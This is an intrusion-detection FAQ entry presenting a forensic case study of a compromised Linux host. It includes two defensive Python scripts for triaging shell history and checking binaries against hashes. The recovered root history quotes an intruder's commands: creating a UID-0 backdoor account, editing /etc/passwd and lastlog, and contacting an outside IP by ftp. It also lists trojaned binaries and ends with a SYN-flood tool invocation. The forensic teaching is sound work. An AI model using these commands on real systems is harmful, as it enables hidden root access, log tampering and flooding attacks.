
Intrusion Detection FAQ: Is it really important to make sure the root account has a history file?

Yes! Many times this is one of the most important sources of information about a compromise or potential compromise. Consider the following forensic work submitted by David Rust.

On November 12-13th, a machine running SuSE 5.1 Linux 2.0.33 under our control was compromised, inundating our local network with traffic.

Once the machine was restored to our control, we discovered the system log files were erased, but several files were left behind, one of which was a .bash_history in the root directory.

BASH_HISTORY (verbatim)

/usr/sbin/useradd -d /home/skrilla -m -s /bin/bash skrilla
/usr/sbin/useradd -u 0 -o -g 0 -G 0 -d /home/skrilla -s /bin/bash rewt
passwd skrilla
passwd rewt
cat /etc/hosts.deny
cat /etc/hosts.allow
ftp 158.252.134.246
su skrilla
pico /etc/passwd
cd /var/log
ls
grep "sdn" *
id
clear
ls
pico lastlog
who
su rewt

The `grep "sdn" *` command appears to search for evidence of the attacker's address. Fortunately, he left it behind with the ftp command.
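The recovered history above is short enough to read by eye, but on a busier system the same review is worth automating. The script below is an added example written for this FAQ entry, not part of the original submission: it walks a .bash_history line by line, keeps track of the working directory so that relative paths like "pico lastlog" resolve correctly after "cd /var/log", and flags the patterns seen in this incident (a UID-0 account created with useradd -u 0 -o, an editor opened on /etc/passwd or a log file, and any IPv4 address typed on the command line). The sample history is the one printed above; the category names and the lists of editors and sensitive files are the example's own choices.

```python
import posixpath
import re

# Editors an intruder might use to hand-edit account or log files (example's own list)
EDITORS = {"pico", "vi", "vim", "nano", "ed", "emacs", "joe"}
# Files whose manual editing from a root shell deserves a second look (example's own list)
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/hosts.allow",
             "/etc/hosts.deny", "/etc/inetd.conf"}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Sample input: the root .bash_history recovered in the incident described above
SAMPLE_HISTORY = """\
/usr/sbin/useradd -d /home/skrilla -m -s /bin/bash skrilla
/usr/sbin/useradd -u 0 -o -g 0 -G 0 -d /home/skrilla -s /bin/bash rewt
passwd skrilla
passwd rewt
cat /etc/hosts.deny
cat /etc/hosts.allow
ftp 158.252.134.246
su skrilla
pico /etc/passwd
cd /var/log
ls
grep "sdn" *
id
clear
ls
pico lastlog
who
su rewt
"""


def triage_history(text, start_cwd="/root"):
    """Return (line_number, category, detail) tuples for suspicious history lines."""
    cwd = start_cwd
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        tokens = line.split()
        if not tokens:
            continue
        cmd = posixpath.basename(tokens[0])   # "/usr/sbin/useradd" -> "useradd"
        args = tokens[1:]

        # Follow "cd" so later relative file names can be resolved
        if cmd == "cd":
            cwd = posixpath.normpath(posixpath.join(cwd, args[0])) if args else start_cwd
            continue

        # Account creation; "-u 0" means a second root-equivalent login
        if cmd == "useradd" and args:
            user = args[-1]
            kind = "account_added"
            if "-u" in args:
                i = args.index("-u")
                if i + 1 < len(args) and args[i + 1] == "0":
                    kind = "uid0_account"
            findings.append((n, kind, user))

        # Any literal IPv4 address is a lead on where the session came from or went to
        for ip in IPV4.findall(line):
            findings.append((n, "remote_address", ip))

        # Hand-editing of account files or anything under /var/log
        if cmd in EDITORS:
            for a in args:
                if a.startswith("-"):
                    continue
                path = posixpath.normpath(posixpath.join(cwd, a))
                if path in SENSITIVE:
                    findings.append((n, "sensitive_file_edit", path))
                elif path.startswith("/var/log/"):
                    findings.append((n, "log_edit", path))
    return findings


if __name__ == "__main__":
    for lineno, category, detail in triage_history(SAMPLE_HISTORY):
        print(f"line {lineno:>3}: {category:<20} {detail}")
```

Run against the sample it reports the rewt UID-0 account on line 2, the ftp address on line 7, the /etc/passwd edit on line 9 and, thanks to the tracked working directory, the lastlog edit on line 16 as /var/log/lastlog. The history file is only useful if it survives: the same review should be run from a copy taken off the host, since an intruder who remembers to clear it (or who links it to /dev/null) leaves nothing to read.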

In addition to that, several programs were replaced with altered versions:

ifconfig
ps
in.rshd
psdevtab
chfn
inetd
netstat
chsh
killall
passwd
syslogd
du
login
tcpd
find
ls
top
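The list of replaced binaries shows why the compromised host's own tools cannot be trusted to find the replacements: ls, find and ps are among them. What catches this is a hash baseline of the system binaries, recorded while the host was known good and stored off the host, then compared from a trusted boot medium. The following is an added example, not code from the original submission: it hashes the binaries named above with SHA-256, stores the digests, and reports which files were modified or removed. The demo runs entirely in a temporary directory with placeholder file contents, so the tampering it detects is constructed for the example.

```python
import hashlib
import os
import tempfile

# Binaries reported as replaced in the incident above, used here as the watch list
WATCHED = ["ifconfig", "ps", "in.rshd", "psdevtab", "chfn", "inetd", "netstat",
           "chsh", "killall", "passwd", "syslogd", "du", "login", "tcpd",
           "find", "ls", "top"]


def hash_file(path):
    """SHA-256 of a file, read in chunks so large binaries do not load whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, names):
    """Map each watched name under root to its digest (recorded while known good)."""
    baseline = {}
    for name in names:
        path = os.path.join(root, name)
        if os.path.isfile(path):
            baseline[name] = hash_file(path)
    return baseline


def verify(root, baseline):
    """Compare the files under root with a stored baseline."""
    report = {"ok": [], "modified": [], "missing": []}
    for name, digest in baseline.items():
        path = os.path.join(root, name)
        if not os.path.isfile(path):
            report["missing"].append(name)
        elif hash_file(path) != digest:
            report["modified"].append(name)
        else:
            report["ok"].append(name)
    return report


def demo():
    """Constructed scenario: baseline a fake bin directory, then trojan ps and drop login."""
    with tempfile.TemporaryDirectory() as root:
        for name in WATCHED:
            with open(os.path.join(root, name), "wb") as f:
                f.write(b"placeholder-binary:" + name.encode())   # not a real ELF
        baseline = build_baseline(root, WATCHED)

        # Simulated tampering: ps is replaced, login is removed
        with open(os.path.join(root, "ps"), "ab") as f:
            f.write(b"\x00trojan")
        os.remove(os.path.join(root, "login"))

        return verify(root, baseline)


if __name__ == "__main__":
    result = demo()
    print("modified:", result["modified"])
    print("missing: ", result["missing"])
    print("unchanged:", len(result["ok"]))
```

In practice the baseline file and this checker both belong on read-only or off-host media, and the comparison is run after booting from known-good media; a baseline left on the compromised disk can simply be regenerated by whoever replaced the binaries.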
Of course, passwd and shadow were attacked, effectively locking administrators out of the machine.

In addition to the above modified binaries, we found two additional files:
synk and synk4. synk contained 36 lines: ./synk4 0 $1 0 65535 >/dev/null &